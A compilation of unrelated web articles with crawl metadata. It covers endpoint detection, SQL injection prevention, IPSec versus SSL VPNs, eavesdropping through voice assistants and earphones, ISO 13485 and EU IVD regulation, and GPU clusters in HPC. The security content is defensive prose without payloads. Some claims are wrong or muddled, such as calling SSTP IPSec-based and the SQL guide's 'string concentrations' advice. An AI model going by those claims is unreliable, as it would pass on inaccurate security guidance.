As technology grows, so do threats. Adversaries in the modern day are constantly finding new ways to damage businesses and steal information.
Gone are the days of antivirus; companies are now having to tailor their defence mechanisms in the same way adversaries are tailoring their attacks. One singular, fool-proof method is no longer effective because attacks are gradually becoming more specific to each organisation.
What's the solution?
With antiviruses failing to meet the expectation of many companies and yet many companies still relying on this technology, we are left with a problem. Do we remove our technology that we have depended on for so long? Do we restructure our security measures?
The answer to this is to reinforce our technology with extra security measures that adapt to the current landscape of cybersecurity. In this day and age, endpoint detection is essential.
What is endpoint detection?
Endpoint detection is a system that constantly monitors activity over one network and responds to advanced threats. In contrast to antivirus which just protects individual systems, endpoint detection serves to protect an entire network. This is more secure for many businesses.
We have recently seen some companies implement AI into their endpoint security. The advantage with using machine learning is that it allows software to automatically detect threats and adapt more quickly to potential adversaries.
By noticing patterns through machine learning, AI backed endpoint security can bring in a level of security that was previously unheard of. In fact, companies such as CrowdStrike are now incorporating endpoint protection that even works in real time.
Even the former leaders in antivirus software are recognising the importance of Endpoint Detection. Slowly, we are seeing companies such as McAfee and Symantec developing technology that provide a more in-depth level of security that is adapting to the speed in which current adversaries are working at. | <urn:uuid:cb922f91-6752-44eb-a922-5477272670bd> | CC-MAIN-2024-38 | https://em360tech.com/tech-news/antivirus-endpoint-security | 2024-09-07T14:17:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00128.warc.gz | en | 0.968786 | 366 | 2.703125 | 3 |
SQL injections are arguably the most common type of web attack to steal sensitive data from organizations. Any time you hear about data breaches resulting in stolen passwords or credit card data, it’s often the result of an SQL injection.
This in-depth guide is designed to help web administrators and website owners prevent SQL injections before an attack. Follow the steps below to learn how to prevent SQL injections and keep your company’s data safe.
Step #1: Validate User Inputs
One of the first things you should do is validate all user inputs. The process is commonly referred to as a “query redesign” or “input validation.”
You’ll need to identify your most essential SQLs and create a whitelist for valid SQL statements. Then leave all unvalidated statements out of your queries.
You can also set up the user inputs as they relate to different contexts. For example, let’s say you have a form field on your website for visitors to input their email addresses. This field could be set up to only allow submissions with an “@” symbol, which could filter out someone from injecting something malicious into this field.
For fields asking for a social security number or phone number, you can limit those to only accept submissions with nine digits and ten digits, respectively.
This step alone won’t stop an SQL attack, but it’s a basic website security step that you can take to prevent common SQL injections.
Step #2: Data Sanitization
Next, you should do a data audit and clean up your data that contains special characters.
It’s common for attackers using SQL injections to use sequences of unique characters to exploit unsanitized databases. But if you set up your database to deny string concentrations, you can prevent these attacks.
This takes your input validation one step further. If you limit special characters in your data, it ensures that dangerous special characters from an SQL injection won’t get passed into an SQL query with instructions.
Using prepared statements is an excellent way to prevent unauthenticated queries in your SQL databases. But it starts with data sanitization, specifically by limiting special characters.
Step #3: Actively Track Updates and Patching
Attackers have a knack for finding vulnerabilities in different databases and web applications. This turns into a game of cat and mouse.
Once an application realizes that something in its system is exploitable for SQL injections, they need to patch the vulnerability. But if you’re not keeping track of these and don’t update applications, software, or plugins, then your site will still be susceptible to those attacks.
It’s crucial that you keep a close eye on your plugins, frameworks, server software, libraries, and everything else tied to your website. If there’s a new version, make sure you update it ASAP. Many times you’ll get a notification for updates, but other times you’ll need to do some digging.
Depending on the size of your organization and the number of programs it uses, you might need to consider investing in a patch management tool.
Step #4: Add Stored Procedures to Your Database
Stored procedures use variable binding to mitigate SQL injections. These procedures live in the database and connect to web applications.
While this won’t make your system completely impenetrable for SQL injections, it definitely helps. With that said, dynamic SQL generation can still bypass stored procedures.
So you should also harden your applications and operating system when you’re going through this step. Again, it’s not completely foolproof. But this extra effort makes it a little more challenging for SQL attacks to penetrate your hardened systems.
Step #5: Leverage Parameterization and Prepared Statements
Similar to stored procedures, parameterization and prepared statements use variable binding to write database queries.
If you take the time to define all of the SQL code in each query, you’ll be able to tell the difference between code and user input.
Many web administrators use dynamic SQL coding techniques for added flexibility with application development. However, dynamic SQL could make databases treat certain code as instructions. So if malicious code is executed via an SQL injection, it could be a problem.
But if you stick with standard SQLs, databases won’t treat malicious statements as commands. Instead, they’ll just get inputted as data—limiting the potential impact of the injection.
Step #6: Use Firewalls
I highly recommend using a WAF (web application firewall). An appliance-based WAF is an excellent and easy way to filter malicious data from your site.
Many of the best WAF solutions on the market today have default systems in place that prevent SQL injections. You can also configure these tools to meet your specific needs.
Refer back to step 3 on patching. Your WAF can potentially double as a solution to help you with patching and update management.
These commonly come in two different forms.
- NGFW — Next-generation firewall
- FWaaS — Firewall-as-a-service
Some of the modern FWaaS solutions come with next-generation functionality. It’s also worth noting that NFGW can be hosted in the cloud as well, meaning it doubles as FWaaS.
ModSecurity is a popular free and open-source WAF. It has SQL injection prevention capabilities that detect and filter potentially malicious web requests.
Step #7: Create User Privileges and Tighten Up Access Controls
It’s in your best interest to create and enforce the policy of least privilege. Think about what would happen if your SQL databases were compromised. You can reduce these risks with these types of access policies.
That’s why we previously discussed the importance of using select statements for your databases. You shouldn’t also have privileges to update, insert, or delete items. These make your system more susceptible to malicious commands via SQL injections.
With an access control policy, set up your database so that only users with administrative-level permissions can gain access. All other users should be automatically denied.
This way, if another user in your organization without admin-level access is compromised by an SQL attack, the attacker’s access will be limited.
You can take this one step further by configuring your database for read-only access. So if certain users without admin-level permissions need to use a database, they won’t have the ability to edit anything.
Again, if an attacker gains access to these types of credentials using an SQL injection, the database can’t be altered if the access is read-only.
Enforcing password policies is another way to harden your access controls. Beyond restricting access by user privileges, you can also reduce the chances of a breach by forcing users in your organization to protect their accounts.
Any default passwords should be changed immediately. You can also enforce password policies with minimum character lengths and complex character requirements for every account type. Set user passwords to expire on a regular basis, and force your team to continually update their accounts according to these policies.
Step #8: Eliminate User Accounts and Shared Databases
If multiple applications or websites are using the same shared database, it can be a disaster if you fall victim to a successful SQL injection. The same holds true for user accounts with access to multiple web apps.
While shared access might make things easier to complete tasks within your organization, it adds a significant risk for attacks.
Instead, make sure any connected servers have the least amount of access to the target server. Make sure these databases are structured, so they only have access to mission-critical information.
Each server linked should have its own unique login and account from other processes on your target server.
Step #9: Limit Information in Errors and Encryption Policies
This is a big mistake that I see web administrators make all of the time: They divulge way too much information in error messages.
Attackers can figure out a ton of information about your database architecture simply by reading your error messages. By only including minimal information, you can prevent the unintentional exposure of your architecture secrets.
The best way to do this is with “RemoteOnly” customErrors or similar configurations. This means that a detailed error message will only be displayed on local machines that are verified and trusted. But if an external hacker attempts an SQL injection and gets an error, they’ll just see a basic error message that doesn’t display any further details.
This can help safeguard your account names, table names, internal database structure, and more—ultimately making it more difficult for an attacker trying to find weak links for an SQL injection.
Using the same logic and thought process, you should also ensure your encryption keys are kept private as well.
Encryption is an excellent way to protect sensitive data while it’s in motion or in storage. But it’s useless if you’re not protecting your cryptography keys.
Make sure you really establish proper encryption and hashing policies. Otherwise, hackers can get their hands on the keys required to decrypt sensitive data and deploy an SQL injection.
Step #10: Deny Extended URLs
Many SQL injection attackers send extended URLs with the intention of server failure during login. This has been well-documented as an exploitation technique that triggers stack-based buffer overflows—all from long URLs.
Lots of web servers today are built to process large requests, including requests larger than 4096 bytes. But your web server software might not place the context of these requests in your log files. What does this mean?
An attacker could go under the radar and undetected with an SQL injection using extended URLs. A simple solution for this is to limit all URLs to 2048 bytes. Everything else will be denied by default.
Common Problems When Preventing SQL Injections
The steps above will definitely put you on the right track to preventing SQL injections. With that said, it’s common for some people to run across stumbling blocks or pain points when they’re going through this process.
I’ve identified the most common problems for SQL injection prevention and explained the solutions below.
Problem #1: SQL Injection Detection
Let’s say you’ve taken all of the steps in this guide to prevent SQL injection attacks. Now what?
Like many hacks and malicious attacks, there is no way to 100% stop and prevent SQL injections. Even if you’re following all of the latest tips, security policies, and best practices, a newer or sophisticated injection can still penetrate your site and database.
But unlike other types of attacks, SQL injections aren’t always obvious. It’s not like ransomware, which clearly shows when there has been a breach.
The best way to overcome this problem is with regular scans. I recommend using web vulnerability scanners, like Acunetix.
Acunetix gives you 90% of the scan results in minutes, allowing you to quickly identify any SQL injections, as well as other potential vulnerabilities. It automatically prioritizes your highest-risk vulnerabilities, so you know exactly what to fix first.
Problem #2: Assessing Weak Points
Using a tool to scan for vulnerabilities is great. However, you’ll still be playing a bit of catch-up if an SQL injection is detected.
Obviously, you’d rather stop the injection before it occurs. But how can you identify areas where you’re most vulnerable to an attack?
Running self-imposed attacks against your website or application is a viable option. Common ways SQL injection methods for this include:
- In-band SQL Injections — It’s one of the most popular SQL injection attacks that can come in an error-based or union-based form. The error-based method tests to see which queries get error messages so attackers can identify the database structure. Union-based attacks use statements and send results to the graphical user interface.
- Inferential SQL Injections — Also known as blind SQL attacks, an attacker can send Boolean-based attacks or time-based attacks. The first method forces a web application to return true or false statements that they can decipher into specific payloads. The latter sends queries to the database with a specified time cadence. But both options force the attackers to decipher data one character at a time.
- Out-of-Band SQL Injections — These attacks aren’t as common. They rely on database servers making HTTP requests or DNS requests to deliver data to the hacker.
Rather than performing these attacks on your own, you can use penetration testing tools to assess weak points in your website or web applications.
Problem #3: Continuous Monitoring and Audits
Preventing SQL injections is just one of the dozens of steps an organization must take to protect data and enforce cybersecurity policies.
So it’s common for organizations to follow these steps but then let the process fall by the wayside. This is a problem.
Instead, make sure you set reminders and assign responsibility to IT security members to review audit logs on a regular basis. This can coincide with your password policy updates and software patching that we discussed earlier.
It’s also in your best interest to go back and re-do some of the steps in this guide on a regular basis. For example, your access control policies might change over time, especially as your team scales and you add new tools. So you’ll need to assess those policies and user privileges to see if you’re still enforcing the best least privilege principles. | <urn:uuid:6c4309b2-3690-4c8a-afa1-7997a284149a> | CC-MAIN-2024-38 | https://nira.com/how-to-prevent-sql-injections/ | 2024-09-07T13:23:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650883.10/warc/CC-MAIN-20240907131200-20240907161200-00128.warc.gz | en | 0.906748 | 2,825 | 2.625 | 3 |
Plenty of other articles out there compare and contrast IPSec vs SSL VPNs from the perspective of a network admin who has to set them up. This article, however, will examine how major commercial VPN providers utilize SSL and IPSec in their consumer services, which are intended to provide access to the web and not a corporate network.
VPN protocols that use IPSec encryption include L2TP, IKEv2, and SSTP. OpenVPN is the most popular protocol that uses SSL encryption, specifically the OpenSSL library. SSL is used in some browser-based VPNs as well.
This article compares and contrasts IPSec vs SSL encryption from the VPN end-user standpoint.
The basics of VPN encryption
VPN encryption scrambles the contents of your internet traffic in such a way that it can only be un-scrambled (decrypted) using the correct key. Outgoing data is encrypted before it leaves your device. It’s then sent to the VPN server, which decrypts the data with the appropriate key. From there, your data is sent on to its destination, such as a website. The encryption prevents anyone who happens to intercept the data between you and the VPN server—internet service providers, government agencies, wifi hackers, etc—from being able to decipher the contents.
Incoming traffic goes through the same process in reverse. If data is coming from a website, it first goes to the VPN server. The VPN server encrypts the data, then sends it to your device. Your device then decrypts the data so you can view the website normally.
All of this ensures that VPN users’ internet data remains private and out of the hands of any unauthorized parties.
The differences between varying types of encryption include:
- Encryption strength, or the method and degree to which your data is scrambled
- How the encryption keys are managed and exchanged
- What interfaces, protocols, and ports they use
- What OSI layers they run on
- Ease of deployment
- Performance (read: speed)
What is IPSec and what is SSL?
- SSL (Secure Sockets Layer) operates at the application layer of the OSI model. It encrypts the data exchanged between the user’s browser and the web server.
- IPsec (Internet Protocol Security) secures internet communication at the network layer. It is a suite of protocols for encrypting and authenticating network traffic.
For a more detailed explanation of the two protocols, check out our in-depth guide on common types of encryption.
In short: Slight edge in favor of SSL.
IPSec connections require a pre-shared key to exist on both the client and the server in order to encrypt and send traffic to each other. A pre-shared key (PSK) is a is a piece of data — known only to the parties involved — that has previously been securely shared between two computers before it needs to be used.
SSL VPNs don’t have this problem because they use public key cryptography to negotiate a handshake and securely exchange encryption keys. Public key cryptography, also known as asymmetric cryptography, uses a pair of keys for secure communication: a public key and a private key. Unlike symmetric cryptography, where the same key is used for both encryption and decryption, public key cryptography uses two different but mathematically related keys.
Despite this, TLS/SSL has a long list of its own vulnerabilities. These include Padding Oracle on Downgraded Legacy Encryption (POODLE), Browser Exploit Against SSL/TLS (BEAST), Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext (BREACH), and Heartbleed.
Some SSL VPNs allow untrusted, self-signed certificates and don’t verify clients. This is particularly common in “clientless” SSL VPN browser extensions. These VPNs that allow anyone to connect from any machine are vulnerable to man-in-the-middle (MITM) attacks. However, this is not the case with most native OpenVPN clients.
SSL typically requires more frequent patches to keep up to date, for both the server and client.
The lack of open-source code for IPSec-based VPN protocols may be a concern for people wary of government spies and snoopers. Open-source code allows anyone to examine it for vulnerabilities and suggest fixes. Closed-source code is manipulated in-house and hidden from the end-user.
In 2013, Edward Snowden revealed the US National Security Agency’s Bullrun program actively tried to “insert vulnerabilities into commercial encryption systems, IT systems, networks, and endpoint communications devices used by targets.” The NSA allegedly targeted IPSec to add backdoors and side channels that could be exploited by hackers.
In the end, strong security is more likely the result of skilled and mindful network administrators rather than choice of protocol.
In short: SSL-based VPNs are generally better for bypassing firewalls.
NAT firewalls often exist on wifi routers and other network hardware. To protect against threats, they throw out any internet traffic that isn’t recognized, which includes data packets without port numbers. Encrypted IPSec packets (ESP packets) have no port numbers assigned by default, which means they can get caught in NAT firewalls. This can prevent IPSec VPNs from working.
To get around this, many IPSec VPNs encapsulate ESP packets inside UDP packets, so that the data is assigned a UDP port number, usually UDP 4500. While this solves the NAT traversal problem, your network firewall may not allow packets on that port. Network administrators at hotels, airports, and other places may only allow traffic on a few required protocols, and UDP 4500 may not be among them.
SSL traffic can travel over port 443, which most devices recognize as the port used for secure HTTPS traffic. Almost all networks allow HTTPS traffic on port 443, so we can assume it’s open. OpenVPN uses port 1194 by default for UDP traffic, but it can be forwarded through either UDP or TCP ports, including TCP port 443. This makes SSL more useful for bypassing firewalls and other forms of censorship that block traffic based on ports.
Speed and reliability
In short: Both are reasonably fast, but IKEv2/IPSec negotiates connections the fastest.
Most IPSec-based VPN protocols take longer to negotiate a connection than SSL-based protocols, but this isn’t the case with IKEv2/IPSec.
IKEv2 is an IPSec-based VPN protocol that’s been around for over a decade, but it’s now trending among VPN providers. Driving its deployment is its ability to quickly and reliably reconnect whenever the VPN connection is interrupted. This makes it especially useful for mobile iOS and Android clients that don’t have reliable connections or those that frequently switch between mobile data and wifi.
As for actual throughput, it’s a toss-up. We’ve seen arguments from both sides. In a blog post, NordVPN states that IKEv2/IPSec can offer faster throughput than rivals like OpenVPN. Both protocols typically use either the 128-bit or 256-bit AES cipher.
The extra UDP layer that many providers put on IPSec traffic to help it traverse firewalls adds extra overhead, which means it requires more resources to process. But most people won’t notice a difference.
On most consumer VPNs, throughput is determined largely by server and network congestion rather than the VPN protocol.
See also: Fastest VPNs
Ease of use
In short: IPSec is more universal, but most users who use VPN providers’ apps won’t notice a huge difference.
IKEv2, SSTP, and L2TP are built-in IPSec-based VPN protocols on most major operating systems, which means it doesn’t necessarily require an extra application to get up and running. Most users of consumer VPNs will still use the provider’s app to get connected, though.
SSL works by default in most web browsers, but a third-party application is usually necessary to use OpenVPN. Again, this is usually taken care of by the VPN provider’s app.
In our experience, IKEv2 tends to offer a more seamless experience than OpenVPN from an end-user standpoint. This is largely due to the fact that IKEv2 connects and handles interruptions quickly. That being said, OpenVPN tends to be more versatile and may be better suited to users who can’t accomplish what they want with IKEv2.
When it comes to corporate VPNs that provide access to a company network rather than the internet, the general consensus is that IPSec is preferable for site-to-site VPNs, and SSL is better for remote access. The reason is that IPSec operates at the Network Layer of the OSI model, which gives the user full access to the corporate network regardless of application. It is more difficult to restrict access to specific resources. SSL VPNs, on the other hand, enable enterprises to control remote access at a granular level to specific applications.
Network administrators who operate VPNs tend to find client management a lot easier and less time-consuming with SSL than with IPSec.
IPSec vs SSL VPNs: Conclusion
All in all, for VPN users who have both options, we recommend going for IKEv2/IPSec first, then turning to OpenVPN/SSL should any issues crop up. The speed at which IKEv2 is able to negotiate and establish connections will offer a more tangible quality-of-life improvement for the average, everyday VPN user, while offering comparable security and speed — but it may not work under all circumstances.
OpenVPN/SSL was until quite recently considered the best VPN combination for most users of consumer VPNs. OpenVPN, which uses the OpenSSL library for encryption and authentication, is reasonably fast, very secure, open source, and can traverse NAT firewalls. It can support either the UDP or TCP protocol.
IKEv2/IPSec presents a new challenger to OpenVPN, improving on L2TP and other IPSec-based protocols with faster connections, more stability, and built-in support on most newer consumer devices.
SSL and IPSec both boast strong security pedigrees with comparable throughput speed, security, and ease of use for most customers of commercial VPN services.
IPSec vs SSL VPNs FAQs
Do SSL VPNs hide IP addresses?
SSL VPNs can provide anonymity by hiding IP addresses, but they can also be configured to reveal IP addresses. It all depends on how the SSL VPN is configured. If you want complete anonymity, you’ll need to make sure that the SSL VPN is configured properly to avoid activities leaking to your ISP. | <urn:uuid:f36df7eb-acef-4310-be35-b1d9173e15a7> | CC-MAIN-2024-38 | https://www.comparitech.com/blog/vpn-privacy/ipsec-vs-ssl-vpn/ | 2024-09-09T22:20:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651157.15/warc/CC-MAIN-20240909201932-20240909231932-00828.warc.gz | en | 0.928898 | 2,257 | 3.234375 | 3 |
Nowadays the proverb “the walls have ears” is not as metaphoric as it used to be.
“The telescreen received and transmitted simultaneously. Any sound that Winston made, above the level of a very low whisper, would be picked up by it … There was of course no way of knowing whether you were being watched at any given moment.” That is George Orwell’s description of Big Brother’s spying devices in the novel 1984.
What if Big Brother weren’t the only one with access to the telescreen, though? What if pretty much anybody with the necessary skill set could listen in? And what if that screen were used not only for political propaganda, but also for displaying personalized ads: say, you complain to your spouse about a headache and immediately see a commercial for a painkiller? This is no longer a plot from a dystopian novel; it’s close to reality — a bit futuristic, but with a good chance of becoming real in the very near future.
We’ve already surrounded ourselves with budding telescreens, and their new features — such as voice assistants — are quite capable of becoming new threats.
Virtual assistants such as Apple Siri live in smartphones, tablets, and laptops, or in stationary devices like Amazon Echo or Google Home smart speakers. People use them to turn music on and off, check weather forecasts, adjust room temperature, order goods online, and do many other things.
Can these vigilant microphones do harm? Sure. The first possibility that comes to mind is the leaking of personal and corporate data. But here’s another one that is even easier for cybercriminals to turn into money: Do you dictate your credit card numbers and one-time passwords to fill in forms on websites?
Smart speakers can interpret voices even in noisy surrounding or with music playing. You don’t even need to speak very clearly to be understood: In my experience, Google’s voice assistant in a common Android tablet sometimes understands 3-year-old children better than it understands their parents.
Here are a few stories that might seem funny and alarming at the same time. All of them are related to different voice assistants and smart gadgets. Sci-fi writers have long dreamed about machines we can talk to, but even they couldn’t have imagined these situations that happened in the real life.
The speaker rebellion
In January 2017, San Diego, California, channel CW6 aired an interesting news segment about the vulnerabilities of Amazon Echo speakers (equipped with the Alexa virtual assistant).
The system is unable to differentiate people by voice, the show hosts explained, which means Alexa will follow the orders of anybody who is around. As a result, little kids started making unplanned online purchases, not knowing the difference between asking their parents to give them a snack and asking Alexa to give them a toy.
Then one of hosts said on air: “I love the little girl, saying ‘Alexa, order me a dollhouse.” The complaints began rolling in. People all over San Diego reported spontaneous purchases of dollhouses made by their voice assistants. Alexa heard a line uttered on television as a command and swiftly fulfilled it.
Amazon assured the victims of “AI rebellion” they could cancel their orders and not have to pay.
Gadgets under oath
Gadgets that can listen are valuable for law enforcement agencies because they can (typically) repeat anything they’ve heard. Here’s a detective story that happened in Arkansas is 2015.
Four men had a party. They watched football, drank, relaxed in the hot tub — nothing out of the ordinary. The next morning, the owner of the house found the lifeless body of one of the guests in the tub. He quickly became the number one suspect; the other guests said they had left the party before anything happened.
Detectives noticed a lot of smart devices in the home: lighting and security systems, a weather station — and an Amazon Echo. The police decided to question it. Detectives hoped to get voice recordings made at the night of murder. They asked Amazon to share the data, but the company allegedly refused.
Amazon developers claim that Echo doesn’t record sounds all the time, only when the user pronounces the wake-up word — by default, Alexa. Then the command is stored on the company’s servers for a limited time. Amazon claims it stores commands only to improve customer service, and users can manually delete all records in their account settings.
Anyway, detectives found another device from which to gather clues. They entered into evidence the testimony of a … smart water meter. In the early-morning hours after the victim’s death, an exorbitant amount of water was apparently used. The house owner claimed that he was already asleep at that time. Investigators suspected that water was used to clean up blood.
It’s noteworthy that the smart meter’s indications seem to be inaccurate. In addition to the very high water usage in the middle of the night, it reported water consumption was no higher than 40 liters per hour the day of the party, but you don’t fill a hot tub at those rates. The accused owner gave an interview to StopSmartMeters.org (yes, a website created by haters of smart meters); he said he supposed that the time on the meter was set wrong.
The case goes to court this year.
Virtual assistants in movies
Modern mass culture also treats virtual assistants with suspicion. For example, in the movie Passengers, the android bartender Arthur reveals Jim Preston’s secret and damages his reputation in the eyes of his companion, Aurora. In Why Him? voice assistant Justine eavesdrops on a telephone call of the protagonist, Ned Fleming, and rats him out.
The car as a wiretap
Forbes also reports a few interesting cases of electronic devices being used against their owners.
In 2001, the FBI got permission from a Nevada court to request ATX Technologies’ help to intercept communications in a private car. ATX Technologies develops and manages utility car systems that enable car owners to request assistance in case of traffic accident.
The company complied with the request. Unfortunately, technical details were not published, except for the FBI’s demand that such surveillance be carried out with “a minimum of interference” to the quality of services provided to the suspect. It seems quite possible that eavesdropping was fulfilled over the emergency line, and that the car’s microphone was turned on remotely.
A similar story took place in 2007 in Louisiana. A driver or passenger accidentally pressed the hotline button and called the OnStar emergency service. The operator answered the call. Receiving no response, she notified the police. Then she tried once more to reach the possible victims and heard dialogue that sounded like a part of a drug deal. The operator let the police officer listen in and pinpointed the car’s location. As a result, police stopped the car and found marijuana inside.
In the latter case, the driver’s defense tried to invalidate the police evidence because there was no warrant, but the court rejected this argument because the police did not initiate the wiretap. The suspect had bought the car from a previous owner a few months before the incident and probably didn’t know about the emergency feature. He was ultimately found guilty.
How to stay off the air
In January, at CES 2017 Las Vegas, almost every smart thing presented — from cars to refrigerators — was equipped with a virtual assistant. This trend will surely create new privacy, security, and even physical safety risks.
Every developer needs to make users’ security a top priority. As for ordinary consumers, we have a few tips to help them protect their lives from the all-hearing ears.
- Turn off the microphone on Amazon Echo and Google speakers. There’s a button. It’s not a particularly convenient way to ensure privacy — you will always have to remember to neutralize the assistant — but at least it’s something.
- Use Echo’s account settings to prohibit or password-protect purchasing.
- Use antivirus protection of PCs, tablets, and smartphones to decrease the risk of data leaks and to keep criminals out.
- Change Amazon Echo’s wake word if someone in your household has a name that sounds like “Alexa.” Otherwise any dialogue near the device has the potential to turn into a real nuisance.
That’s not a one-way street
Okay, you taped over the webcam on your laptop, hid your smartphone under a pillow, and threw your Echo away. You feel safe from digital eavesdroppers now … but you’re not. Researchers from Ben-Gurion University (Israel) explain that even common earphones can be turned into listening devices.
- Earphones and passive loudspeakers are basically an inside-out microphone. That means every earphone set connected to a PC can detect sound.
- Some audio chipsets can change the function of an audio port at the software level. This is not a secret — it is stated in the motherboard specifications.
As a result, cybercriminals can turn your earphones into a wiretapping device to secretly record sound and send it to their servers via the Internet. Field studies proved it: In this way, one can record at acceptable quality a conversation taking place several meters away. Consider that people often keep their earphones quite a bit closer, resting them on their necks or on a nearby table.
To protect yourself from this style of attack, use active loudspeakers instead of passive earphones and speakers. Active speakers have a built-in amplifier between the jack and the speaker that stops a signal from coming back to the input side. | <urn:uuid:62d90845-129e-41c7-a5d7-76b329947dda> | CC-MAIN-2024-38 | https://usa.kaspersky.com/blog/voice-recognition-threats/10855/ | 2024-09-11T02:50:06Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00728.warc.gz | en | 0.961781 | 2,014 | 2.703125 | 3 |
Business process automation is an approach that reduces the dependency on individual task executions in core business processes. Software-based tools are used to help organizations reallocate resources, reduce bottlenecks and drive new efficiencies.
Common use cases include:
Historically, automation is used to complete repetitive and simple tasks. But business process automation refers to increasingly complex use cases, including multistep digital tasks, organizing and understanding unstructured data, and communicating using human language.
IT management is one area where business process automation can help organizations maximize resources to focus on initiatives that help grow the business. Many IT tasks, from managing networks and provisioning resources to developing applications, can be automated to help organizations improve operations. | <urn:uuid:c38761bc-a7be-4285-8992-a0700a9f2de5> | CC-MAIN-2024-38 | https://prod-b2b.insight.com/en_US/content-and-resources/glossary/b/business-process-automation.html | 2024-09-13T13:53:35Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651523.40/warc/CC-MAIN-20240913133933-20240913163933-00528.warc.gz | en | 0.908657 | 145 | 2.53125 | 3 |
October 26, 2017
In vitro literally refers to a test or examination outside a living organism. This happens in a laboratory or a vessel or any other controlled testing location. In vitro diagnostic medical devices (IVD’s) comprise of chemical reagents, appliances, and systems anticipated for analysis and diagnosing a disease or any other medical condition. These IVD devices help to determine the health condition of the patient , to medicate, mitigate, cure, or avoid a disease incident in the first place.
Access to the supplier market of in vitro diagnostic medical devices (IVDs), device application, and market performance is regulated through European Directive 98/79/EC (IVDD). The IVDD is applied in the regulation of the member states of the European Union and, as a result, is enforced in UK. The new regulation was issued on 5 May 2017 in the Official Journal of the European Union as In Vitro Diagnostic Device Regulation (IVDR) 2017/746. The new regulation is published to cater to the needs of continuous scientific and technological advancement.
The IVDR presents a new device classification system which is homogenous with that of Global Harmonization Task Force (GHTF) guidelines for classification, and is now risk-based, a modification to which will influence all suppliers of IVDs. Although not directly referenced, ISO 13485 can help. Some of the important outputs of the new regulation are:
The involvement of notified bodies for devices and company audits will be based on the class of device.
The conformity process for negligible risk (Class A devices) will not require involvement of notified bodies (Organizations selected by MHRA for assessment), and implementation of ISO 13485 will help to fulfill the regulation’s requirements. Devices in Class B, C, and D are described by growing risk levels respectively and all these classes will require a notified body to assess product’s conformity.
2) Unique Device Identification: Suppliers must make their devices traceable and identifiable with a Unique Device Identification (UDI) system. ISO 13485:2016 also addresses the same concern, in Clause 7.5.8 which requires a company to document a system for unique device identification. Thus, companies meeting the requirements of ISO 13485:2016 will already have this part of the regulation addressed.
3) Public Display of Summary for Device Safety: Companies providing Class C and Class D (high risk) devices will have to create a summary of device safety considerations, and application details such as clinical data. This summary must be made available to the public. ISO 13485 also requires organizations to conduct clinical trials under design validation protocols, whereas ISO 13485 along with ISO 14971 helps organizations to perform risk management. Therefore, conforming with these standards will help organizations effectively create such summaries.
4) Performance evaluation report: Suppliers will also have to establish conformity with the overall safety and performance criteria of the IVDs. They must submit a performance evaluation report based on the level of risk and associated Class. Again, the ISO 13485 designed systems can help in preparing such reports through risk registers, compliance handling and reporting of adverse events.
5) Observance and market surveillance: The new regulation will lead all member states to have an electronic portal, where suppliers can submit adverse incidents reports, safety corrective actions, flyer or field safety notices (FSN) and summary reports at planned intervals. MHRA already offers Electronic Adverse event reporting in UK. ISO 13485:2016 helps in almost all these requirements. It encompasses reporting of adverse events to a regulatory body, taking corrective actions, issuing advisory notices etc. The only thing suppliers have to do is to include these systems in the input stream of a regulatory body.
6) Notified Bodies: The status of notified bodies in respect to manufacturers/suppliers will be considerably reinforced. Notified bodies will have a privilege and obligation to conduct unscheduled factory inspections and to carryout laboratory tests or physical examinations on IVDs. The regulation also needs alternation of the notified body’s IVD inspectors at suitable intervals. This creates a balance in the understanding and knowledge needed to conduct comprehensive assessments. Implementing ISO 13485 makes a manufacturer’s life easier in case of an inspection i.e. it gives them ability to address many of the inspection’s concerns.
7) Schedule for transition to new regulation: The new regulation was issued on 5th May 2017 and brought into actual enforcement on 25th May 2017. The IVDR will be enforced completely after five years from the actual enforcement date. It means companies have five years to transform to new regulatory requirements after the enforcement date.
In the UK, MHRA is already guiding suppliers and manufacturers on new regulation. For example, the MHRA issued a guide for healthcare professionals which encompasses the application, administration, performance and safety of IVDs, together with point-of-care testing and blood glucose meters. The ln Vitro Diagnostic Device Regulation (IVDR) increases device safety by expanding the scope of the regulation, emphasis on clinical studies, and emphasis on device identification and traceability. It also places emphasis on tracking device performance in the market, unannounced factory inspections and increased involvement of notified bodies.
ISO 13485:2016 helps in meeting all new requirements only if it is implemented correctly. The organization should be always prepared by maintaining a state of audit readiness to pass an unannounced factory inspection.
To learn which documents are needed to comply with EU MDR, download this free white paper: EU MDR Checklist of Mandatory Documents.
You may unsubscribe at any time. For more information, please see our privacy notice. | <urn:uuid:a2d40f8f-ecc5-4f4a-93a5-cfeac0cb99ec> | CC-MAIN-2024-38 | https://advisera.com/13485academy/blog/2017/10/26/how-to-use-iso-13485-to-comply-with-in-vitro-diagnostic-medical-devices-ivd-requirements-in-uk/ | 2024-09-17T08:44:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00228.warc.gz | en | 0.931494 | 1,151 | 2.703125 | 3 |
As of June 2015, the second fastest computer in the world, as measured by the Top500 list employed NVIDIA® GPUs. Of those systems on the same list that use accelerators 60% use NVIDIA GPUs. The performance kick provided by computing accelerators has pushed High Performance Computing (HPC) to new levels. When discussing GPU accelerators, the focus is often on the price-to-performance benefits to the end user. The true cost of managing and using GPUs goes far beyond the hardware price, however. Understanding and managing these costs helps provide more efficient and productive systems.
This is first article in series on ‘managing GPU clusters.’ You can read the entire series or download the complete insideHPC Guide to Managing High Performance GPU Clusters courtesy of NVIDIA and Bright Computing.
The Advantages of GPU Accelerators
The use of NVIDIA GPUs in HPC has provided many applications an accelerated performance beyond what is possible with servers alone. In particular the NVIDIA Tesla® line of GPUs are designed specifically for HPC processing. Offering up to 2.91 TFLOPS of double precision (8.74 TFLOPS using single precision) processing with ECC memory they can be added to almost any suitably equipped x86_64 or IBM Power 8 computing server.
With the support of the NVIDIA Corporation, an HPC software ecosystem has developed and created many applications, both commercial and open source, that take advantage of GPU acceleration. The NVIDIA CUDA® programming model along with OpenCL and OpenACC compilers have provided developers with the software tools needed to port and build applications in many areas including Computational Fluid Dynamics, Molecular Dynamics, Bioinformatics, Deep Learning, Electronic Design and Automation, and others.
